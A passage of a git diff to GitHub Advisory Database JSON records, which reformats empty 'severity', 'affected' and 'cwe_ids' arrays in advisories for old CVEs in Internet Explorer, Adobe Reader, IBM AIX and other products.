"CVE-2010-3971" ], "details": "Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka \"CSS Memory Corruption Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -84,9 +80,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r7qv-4h85-cvgh/GHSA-r7qv-4h85-cvgh.json b/advisories/unreviewed/2022/05/GHSA-r7qv-4h85-cvgh/GHSA-r7qv-4h85-cvgh.json index e588b0a3c79..d3b772ed37c 100644 --- a/advisories/unreviewed/2022/05/GHSA-r7qv-4h85-cvgh/GHSA-r7qv-4h85-cvgh.json +++ b/advisories/unreviewed/2022/05/GHSA-r7qv-4h85-cvgh/GHSA-r7qv-4h85-cvgh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r994-3vjj-vxh7/GHSA-r994-3vjj-vxh7.json b/advisories/unreviewed/2022/05/GHSA-r994-3vjj-vxh7/GHSA-r994-3vjj-vxh7.json index ae2187da3e7..2eeeaccede0 100644 --- a/advisories/unreviewed/2022/05/GHSA-r994-3vjj-vxh7/GHSA-r994-3vjj-vxh7.json +++ b/advisories/unreviewed/2022/05/GHSA-r994-3vjj-vxh7/GHSA-r994-3vjj-vxh7.json @@ -7,12 +7,8 @@ "CVE-2015-6706" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2015-5583, CVE-2015-6705, and CVE-2015-7624.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r9f9-6pf9-r2c4/GHSA-r9f9-6pf9-r2c4.json b/advisories/unreviewed/2022/05/GHSA-r9f9-6pf9-r2c4/GHSA-r9f9-6pf9-r2c4.json index c851e4c60c3..d91b7c48c5b 100644 --- a/advisories/unreviewed/2022/05/GHSA-r9f9-6pf9-r2c4/GHSA-r9f9-6pf9-r2c4.json +++ b/advisories/unreviewed/2022/05/GHSA-r9f9-6pf9-r2c4/GHSA-r9f9-6pf9-r2c4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -71,9 +69,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r9fp-h5cr-3q7c/GHSA-r9fp-h5cr-3q7c.json b/advisories/unreviewed/2022/05/GHSA-r9fp-h5cr-3q7c/GHSA-r9fp-h5cr-3q7c.json index 61c4d595c34..8da40d3f877 100644 --- a/advisories/unreviewed/2022/05/GHSA-r9fp-h5cr-3q7c/GHSA-r9fp-h5cr-3q7c.json +++ b/advisories/unreviewed/2022/05/GHSA-r9fp-h5cr-3q7c/GHSA-r9fp-h5cr-3q7c.json @@ -7,12 +7,8 @@ "CVE-2015-5113" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-4448, CVE-2015-5095, CVE-2015-5099, CVE-2015-5101, CVE-2015-5111, and CVE-2015-5114.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rc45-jq3j-7rr5/GHSA-rc45-jq3j-7rr5.json b/advisories/unreviewed/2022/05/GHSA-rc45-jq3j-7rr5/GHSA-rc45-jq3j-7rr5.json index 6996f3b6dfe..949d2a7c003 100644 --- a/advisories/unreviewed/2022/05/GHSA-rc45-jq3j-7rr5/GHSA-rc45-jq3j-7rr5.json +++ b/advisories/unreviewed/2022/05/GHSA-rc45-jq3j-7rr5/GHSA-rc45-jq3j-7rr5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rc78-crmm-7f5v/GHSA-rc78-crmm-7f5v.json b/advisories/unreviewed/2022/05/GHSA-rc78-crmm-7f5v/GHSA-rc78-crmm-7f5v.json index d7f2046a0e6..113a04c7f3d 100644 --- a/advisories/unreviewed/2022/05/GHSA-rc78-crmm-7f5v/GHSA-rc78-crmm-7f5v.json +++ b/advisories/unreviewed/2022/05/GHSA-rc78-crmm-7f5v/GHSA-rc78-crmm-7f5v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rg2r-4fr3-6jvr/GHSA-rg2r-4fr3-6jvr.json b/advisories/unreviewed/2022/05/GHSA-rg2r-4fr3-6jvr/GHSA-rg2r-4fr3-6jvr.json index 97102ebc858..da84d09aba2 100644 --- a/advisories/unreviewed/2022/05/GHSA-rg2r-4fr3-6jvr/GHSA-rg2r-4fr3-6jvr.json +++ b/advisories/unreviewed/2022/05/GHSA-rg2r-4fr3-6jvr/GHSA-rg2r-4fr3-6jvr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rh3v-mpfh-4wwj/GHSA-rh3v-mpfh-4wwj.json b/advisories/unreviewed/2022/05/GHSA-rh3v-mpfh-4wwj/GHSA-rh3v-mpfh-4wwj.json index 881f85d5105..dd1d93c0197 100644 --- a/advisories/unreviewed/2022/05/GHSA-rh3v-mpfh-4wwj/GHSA-rh3v-mpfh-4wwj.json +++ b/advisories/unreviewed/2022/05/GHSA-rh3v-mpfh-4wwj/GHSA-rh3v-mpfh-4wwj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rhch-pcq2-7gp3/GHSA-rhch-pcq2-7gp3.json b/advisories/unreviewed/2022/05/GHSA-rhch-pcq2-7gp3/GHSA-rhch-pcq2-7gp3.json index 89c93ad4085..ab4f55b4660 100644 --- a/advisories/unreviewed/2022/05/GHSA-rhch-pcq2-7gp3/GHSA-rhch-pcq2-7gp3.json +++ b/advisories/unreviewed/2022/05/GHSA-rhch-pcq2-7gp3/GHSA-rhch-pcq2-7gp3.json @@ -7,12 +7,8 @@ "CVE-2011-3389" ], "details": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a \"BEAST\" attack.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rj97-7gg7-c89r/GHSA-rj97-7gg7-c89r.json b/advisories/unreviewed/2022/05/GHSA-rj97-7gg7-c89r/GHSA-rj97-7gg7-c89r.json index ff43baf7ada..aaad6258de5 100644 --- a/advisories/unreviewed/2022/05/GHSA-rj97-7gg7-c89r/GHSA-rj97-7gg7-c89r.json +++ b/advisories/unreviewed/2022/05/GHSA-rj97-7gg7-c89r/GHSA-rj97-7gg7-c89r.json @@ -7,12 +7,8 @@ "CVE-2014-3074" ], "details": "The runtime linker in IBM AIX 6.1 and 7.1 and VIOS 2.2.x allows local users to create a mode-666 root-owned file, and consequently gain privileges, by setting crafted MALLOCOPTIONS and MALLOCBUCKETS environment-variable values and then executing a setuid program.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -80,9 +76,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rjp4-gcx6-p65v/GHSA-rjp4-gcx6-p65v.json b/advisories/unreviewed/2022/05/GHSA-rjp4-gcx6-p65v/GHSA-rjp4-gcx6-p65v.json index 8af2831bf06..49fd6ff802f 100644 --- a/advisories/unreviewed/2022/05/GHSA-rjp4-gcx6-p65v/GHSA-rjp4-gcx6-p65v.json +++ b/advisories/unreviewed/2022/05/GHSA-rjp4-gcx6-p65v/GHSA-rjp4-gcx6-p65v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rjrw-f92f-5h9w/GHSA-rjrw-f92f-5h9w.json b/advisories/unreviewed/2022/05/GHSA-rjrw-f92f-5h9w/GHSA-rjrw-f92f-5h9w.json index 13e5e0dda17..36a2e5dc74e 100644 --- a/advisories/unreviewed/2022/05/GHSA-rjrw-f92f-5h9w/GHSA-rjrw-f92f-5h9w.json +++ b/advisories/unreviewed/2022/05/GHSA-rjrw-f92f-5h9w/GHSA-rjrw-f92f-5h9w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rmq9-pm5p-f9mx/GHSA-rmq9-pm5p-f9mx.json b/advisories/unreviewed/2022/05/GHSA-rmq9-pm5p-f9mx/GHSA-rmq9-pm5p-f9mx.json index f55ebb8b96b..9ac3e949492 100644 --- a/advisories/unreviewed/2022/05/GHSA-rmq9-pm5p-f9mx/GHSA-rmq9-pm5p-f9mx.json +++ b/advisories/unreviewed/2022/05/GHSA-rmq9-pm5p-f9mx/GHSA-rmq9-pm5p-f9mx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rp45-6hq7-5w57/GHSA-rp45-6hq7-5w57.json b/advisories/unreviewed/2022/05/GHSA-rp45-6hq7-5w57/GHSA-rp45-6hq7-5w57.json index 0c61a29cffe..e9633c32b80 100644 --- a/advisories/unreviewed/2022/05/GHSA-rp45-6hq7-5w57/GHSA-rp45-6hq7-5w57.json +++ b/advisories/unreviewed/2022/05/GHSA-rp45-6hq7-5w57/GHSA-rp45-6hq7-5w57.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rq2j-8xvq-r3pq/GHSA-rq2j-8xvq-r3pq.json b/advisories/unreviewed/2022/05/GHSA-rq2j-8xvq-r3pq/GHSA-rq2j-8xvq-r3pq.json index 4e87c3ef8a7..86950dd878e 100644 --- a/advisories/unreviewed/2022/05/GHSA-rq2j-8xvq-r3pq/GHSA-rq2j-8xvq-r3pq.json +++ b/advisories/unreviewed/2022/05/GHSA-rq2j-8xvq-r3pq/GHSA-rq2j-8xvq-r3pq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rq97-7qf9-rh8f/GHSA-rq97-7qf9-rh8f.json b/advisories/unreviewed/2022/05/GHSA-rq97-7qf9-rh8f/GHSA-rq97-7qf9-rh8f.json index 987f094ee00..4a991faa5be 100644 --- a/advisories/unreviewed/2022/05/GHSA-rq97-7qf9-rh8f/GHSA-rq97-7qf9-rh8f.json +++ b/advisories/unreviewed/2022/05/GHSA-rq97-7qf9-rh8f/GHSA-rq97-7qf9-rh8f.json @@ -7,12 +7,8 @@ "CVE-2015-6687" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5586, CVE-2015-6683, CVE-2015-6684, CVE-2015-6688, CVE-2015-6689, CVE-2015-6690, CVE-2015-6691, CVE-2015-7615, CVE-2015-7617, and CVE-2015-7621.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rqwx-x2jv-r288/GHSA-rqwx-x2jv-r288.json b/advisories/unreviewed/2022/05/GHSA-rqwx-x2jv-r288/GHSA-rqwx-x2jv-r288.json index f78faeced5a..c2e017b6b6d 100644 --- a/advisories/unreviewed/2022/05/GHSA-rqwx-x2jv-r288/GHSA-rqwx-x2jv-r288.json +++ b/advisories/unreviewed/2022/05/GHSA-rqwx-x2jv-r288/GHSA-rqwx-x2jv-r288.json @@ -7,12 +7,8 @@ "CVE-2014-5247" ], "details": "The _UpgradeBeforeConfigurationChange function in lib/client/gnt_cluster.py in Ganeti 2.10.0 before 2.10.7 and 2.11.0 before 2.11.5 uses world-readable permissions for the configuration backup file, which allows local users to obtain SSL keys, remote API credentials, and other sensitive information by reading the file, related to the upgrade command.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rr9p-xg7r-p8xg/GHSA-rr9p-xg7r-p8xg.json b/advisories/unreviewed/2022/05/GHSA-rr9p-xg7r-p8xg/GHSA-rr9p-xg7r-p8xg.json index 11988fc7045..f0c173f384a 100644 --- a/advisories/unreviewed/2022/05/GHSA-rr9p-xg7r-p8xg/GHSA-rr9p-xg7r-p8xg.json +++ b/advisories/unreviewed/2022/05/GHSA-rr9p-xg7r-p8xg/GHSA-rr9p-xg7r-p8xg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rv5m-qc7j-vmgf/GHSA-rv5m-qc7j-vmgf.json b/advisories/unreviewed/2022/05/GHSA-rv5m-qc7j-vmgf/GHSA-rv5m-qc7j-vmgf.json index 9dd0fe68e30..679d0c5923d 100644 --- a/advisories/unreviewed/2022/05/GHSA-rv5m-qc7j-vmgf/GHSA-rv5m-qc7j-vmgf.json +++ b/advisories/unreviewed/2022/05/GHSA-rv5m-qc7j-vmgf/GHSA-rv5m-qc7j-vmgf.json @@ -7,12 +7,8 @@ "CVE-2013-6905" ], "details": "Cross-site scripting (XSS) vulnerability in a phone component in Cybozu Garoon before 3.7.0, when Internet Explorer or Firefox is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rwj4-529v-8q2x/GHSA-rwj4-529v-8q2x.json b/advisories/unreviewed/2022/05/GHSA-rwj4-529v-8q2x/GHSA-rwj4-529v-8q2x.json index a529f6476b8..db746e536fd 100644 --- a/advisories/unreviewed/2022/05/GHSA-rwj4-529v-8q2x/GHSA-rwj4-529v-8q2x.json +++ b/advisories/unreviewed/2022/05/GHSA-rwj4-529v-8q2x/GHSA-rwj4-529v-8q2x.json @@ -7,12 +7,8 @@ "CVE-2008-7237" ], "details": "Unspecified vulnerability in the Oracle Internet Directory component in Oracle Application Server 9.0.4.3 and 10.1.2.2 allows remote authenticated users to affect confidentiality via unknown vectors, aka AS06.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rxh2-27qh-vh9r/GHSA-rxh2-27qh-vh9r.json b/advisories/unreviewed/2022/05/GHSA-rxh2-27qh-vh9r/GHSA-rxh2-27qh-vh9r.json index e1c93f0c09c..7fced049109 100644 --- a/advisories/unreviewed/2022/05/GHSA-rxh2-27qh-vh9r/GHSA-rxh2-27qh-vh9r.json +++ b/advisories/unreviewed/2022/05/GHSA-rxh2-27qh-vh9r/GHSA-rxh2-27qh-vh9r.json @@ -7,12 +7,8 @@ "CVE-2011-1346" ], "details": "Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by Stephen Fewer as the second of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rxmj-5m65-47mj/GHSA-rxmj-5m65-47mj.json b/advisories/unreviewed/2022/05/GHSA-rxmj-5m65-47mj/GHSA-rxmj-5m65-47mj.json index 8b41b381349..a3fced125b1 100644 --- a/advisories/unreviewed/2022/05/GHSA-rxmj-5m65-47mj/GHSA-rxmj-5m65-47mj.json +++ b/advisories/unreviewed/2022/05/GHSA-rxmj-5m65-47mj/GHSA-rxmj-5m65-47mj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v25x-mmfh-g7w6/GHSA-v25x-mmfh-g7w6.json b/advisories/unreviewed/2022/05/GHSA-v25x-mmfh-g7w6/GHSA-v25x-mmfh-g7w6.json index d8926a1c344..36c57fbefaa 100644 --- a/advisories/unreviewed/2022/05/GHSA-v25x-mmfh-g7w6/GHSA-v25x-mmfh-g7w6.json +++ b/advisories/unreviewed/2022/05/GHSA-v25x-mmfh-g7w6/GHSA-v25x-mmfh-g7w6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v2fg-xxhv-9ch6/GHSA-v2fg-xxhv-9ch6.json b/advisories/unreviewed/2022/05/GHSA-v2fg-xxhv-9ch6/GHSA-v2fg-xxhv-9ch6.json index 54c85e0bcb4..0a841a77da7 100644 --- a/advisories/unreviewed/2022/05/GHSA-v2fg-xxhv-9ch6/GHSA-v2fg-xxhv-9ch6.json +++ b/advisories/unreviewed/2022/05/GHSA-v2fg-xxhv-9ch6/GHSA-v2fg-xxhv-9ch6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v2gp-f824-rv7r/GHSA-v2gp-f824-rv7r.json b/advisories/unreviewed/2022/05/GHSA-v2gp-f824-rv7r/GHSA-v2gp-f824-rv7r.json index 7b0bcc2dd37..00499b23657 100644 --- a/advisories/unreviewed/2022/05/GHSA-v2gp-f824-rv7r/GHSA-v2gp-f824-rv7r.json +++ b/advisories/unreviewed/2022/05/GHSA-v2gp-f824-rv7r/GHSA-v2gp-f824-rv7r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v347-c52r-65xm/GHSA-v347-c52r-65xm.json b/advisories/unreviewed/2022/05/GHSA-v347-c52r-65xm/GHSA-v347-c52r-65xm.json index ab2bea54ef9..09da35fdb54 100644 --- a/advisories/unreviewed/2022/05/GHSA-v347-c52r-65xm/GHSA-v347-c52r-65xm.json +++ b/advisories/unreviewed/2022/05/GHSA-v347-c52r-65xm/GHSA-v347-c52r-65xm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v3vw-x3rj-h727/GHSA-v3vw-x3rj-h727.json b/advisories/unreviewed/2022/05/GHSA-v3vw-x3rj-h727/GHSA-v3vw-x3rj-h727.json index 883b3dce91e..b7cc485a482 100644 --- a/advisories/unreviewed/2022/05/GHSA-v3vw-x3rj-h727/GHSA-v3vw-x3rj-h727.json +++ b/advisories/unreviewed/2022/05/GHSA-v3vw-x3rj-h727/GHSA-v3vw-x3rj-h727.json @@ -7,12 +7,8 @@ "CVE-2012-1880" ], "details": "Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"insertRow Remote Code Execution Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v4mj-2g55-rppc/GHSA-v4mj-2g55-rppc.json b/advisories/unreviewed/2022/05/GHSA-v4mj-2g55-rppc/GHSA-v4mj-2g55-rppc.json index 9243b78817e..f7ad9dabd3b 100644 --- a/advisories/unreviewed/2022/05/GHSA-v4mj-2g55-rppc/GHSA-v4mj-2g55-rppc.json +++ b/advisories/unreviewed/2022/05/GHSA-v4mj-2g55-rppc/GHSA-v4mj-2g55-rppc.json @@ -7,12 +7,8 @@ "CVE-2015-5097" ], "details": "Integer overflow in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5108 and CVE-2015-5109.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v4r5-4mf7-8q28/GHSA-v4r5-4mf7-8q28.json b/advisories/unreviewed/2022/05/GHSA-v4r5-4mf7-8q28/GHSA-v4r5-4mf7-8q28.json index eba34bd59c7..17891572072 100644 --- a/advisories/unreviewed/2022/05/GHSA-v4r5-4mf7-8q28/GHSA-v4r5-4mf7-8q28.json +++ b/advisories/unreviewed/2022/05/GHSA-v4r5-4mf7-8q28/GHSA-v4r5-4mf7-8q28.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v599-g95q-gc6f/GHSA-v599-g95q-gc6f.json b/advisories/unreviewed/2022/05/GHSA-v599-g95q-gc6f/GHSA-v599-g95q-gc6f.json index be814de7d2e..d6e82b684aa 100644 --- a/advisories/unreviewed/2022/05/GHSA-v599-g95q-gc6f/GHSA-v599-g95q-gc6f.json +++ b/advisories/unreviewed/2022/05/GHSA-v599-g95q-gc6f/GHSA-v599-g95q-gc6f.json @@ -7,12 +7,8 @@ "CVE-2015-6683" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5586, CVE-2015-6684, CVE-2015-6687, CVE-2015-6688, CVE-2015-6689, CVE-2015-6690, CVE-2015-6691, CVE-2015-7615, CVE-2015-7617, and CVE-2015-7621.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v5fj-hw7h-m6rg/GHSA-v5fj-hw7h-m6rg.json b/advisories/unreviewed/2022/05/GHSA-v5fj-hw7h-m6rg/GHSA-v5fj-hw7h-m6rg.json index 10a8021625e..760b226d0ff 100644 --- a/advisories/unreviewed/2022/05/GHSA-v5fj-hw7h-m6rg/GHSA-v5fj-hw7h-m6rg.json +++ b/advisories/unreviewed/2022/05/GHSA-v5fj-hw7h-m6rg/GHSA-v5fj-hw7h-m6rg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v6gr-ph59-9hqm/GHSA-v6gr-ph59-9hqm.json b/advisories/unreviewed/2022/05/GHSA-v6gr-ph59-9hqm/GHSA-v6gr-ph59-9hqm.json index b3e285cfc1f..99d00f2ab73 100644 --- a/advisories/unreviewed/2022/05/GHSA-v6gr-ph59-9hqm/GHSA-v6gr-ph59-9hqm.json +++ b/advisories/unreviewed/2022/05/GHSA-v6gr-ph59-9hqm/GHSA-v6gr-ph59-9hqm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v93g-vffx-whwx/GHSA-v93g-vffx-whwx.json b/advisories/unreviewed/2022/05/GHSA-v93g-vffx-whwx/GHSA-v93g-vffx-whwx.json index 9a57b228640..6438678af69 100644 --- a/advisories/unreviewed/2022/05/GHSA-v93g-vffx-whwx/GHSA-v93g-vffx-whwx.json +++ b/advisories/unreviewed/2022/05/GHSA-v93g-vffx-whwx/GHSA-v93g-vffx-whwx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v9f4-qj25-m829/GHSA-v9f4-qj25-m829.json b/advisories/unreviewed/2022/05/GHSA-v9f4-qj25-m829/GHSA-v9f4-qj25-m829.json index 8320fb6c99c..bced467e7a7 100644 --- a/advisories/unreviewed/2022/05/GHSA-v9f4-qj25-m829/GHSA-v9f4-qj25-m829.json +++ b/advisories/unreviewed/2022/05/GHSA-v9f4-qj25-m829/GHSA-v9f4-qj25-m829.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v9xf-2767-3v8v/GHSA-v9xf-2767-3v8v.json b/advisories/unreviewed/2022/05/GHSA-v9xf-2767-3v8v/GHSA-v9xf-2767-3v8v.json index 9c861e42a33..a8974dc8e42 100644 --- a/advisories/unreviewed/2022/05/GHSA-v9xf-2767-3v8v/GHSA-v9xf-2767-3v8v.json +++ b/advisories/unreviewed/2022/05/GHSA-v9xf-2767-3v8v/GHSA-v9xf-2767-3v8v.json @@ -7,12 +7,8 @@ "CVE-2015-6695" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 